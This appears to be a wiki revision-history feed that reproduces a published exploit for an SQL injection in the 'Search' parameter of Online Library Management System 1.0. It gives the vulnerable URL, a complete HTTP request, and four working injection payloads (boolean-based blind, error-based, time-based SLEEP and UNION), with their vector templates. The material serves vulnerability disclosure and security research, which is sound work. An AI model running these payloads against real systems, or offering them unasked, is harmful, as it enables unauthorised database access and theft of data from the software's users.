https://pwnwiki.com/index.php?action=history&feed=atom&title=Online_Library_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
Online Library Management System 1.0 SQL注入漏洞 - Revision history
2026-04-14T23:17:04Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Online_Library_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=5571&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Online Library Management System 1.0 - 'Search' SQL Injection # Date: 23-06-2021 # Exploit Author: Berk Can Geyikci # Vendor Homepage: https://www.sourc..."
2021-06-24T01:09:29Z
<p>Created page with "<pre> # Exploit Title: Online Library Management System 1.0 - 'Search' SQL Injection # Date: 23-06-2021 # Exploit Author: Berk Can Geyikci # Vendor Homepage: https://www.sourc..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Online Library Management System 1.0 - 'Search' SQL Injection<br />
# Date: 23-06-2021<br />
# Exploit Author: Berk Can Geyikci<br />
# Vendor Homepage: https://www.sourcecodester.com/<br />
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip<br />
# Version: 1.0<br />
# Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28<br />
<br />
#Vulnerable URL: http://localhost/ols/index.php?q={random string} <br />
#Search Parameter <br />
<br />
<br />
Request:<br />
<br />
POST /ols/index.php?q=find HTTP/1.1<br />
Host: localhost<br />
Content-Length: 16<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
Origin: http://localhost<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Referer: http://localhost/ols/index.php?q=find<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />
Cookie: PHPSESSID=msjh9j7ngitv8k79g9or1rov0d<br />
Connection: close<br />
<br />
search=a&Search={INJECT HERE}<br />
<br />
<br />
POC 1:<br />
Type: boolean-based blind<br />
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)<br />
Payload: search=AA&Search=') AND 5208=5208#<br />
Vector: AND [INFERENCE]#<br />
<br />
POC 2:<br />
Type: error-based<br />
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br />
Payload: search=aa&Search=') OR (SELECT 5630 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(5630=5630,1))),0x717a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XONS<br />
Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br />
<br />
POC 3:<br />
Type: time-based blind<br />
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />
Payload: search=aa&Search=') AND (SELECT 3884 FROM (SELECT(SLEEP(5)))baxK)-- uNHU<br />
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])<br />
<br />
POC 4:<br />
Type: UNION query<br />
Title: MySQL UNION query (NULL) - 16 columns<br />
Payload: search=aa&Search=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162787171,0x7665436f41665177487458444d6c4358416d6a716869586c476d504b67647178695064414f4e444f,0x717a766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />
</pre></div>
Pwnwiki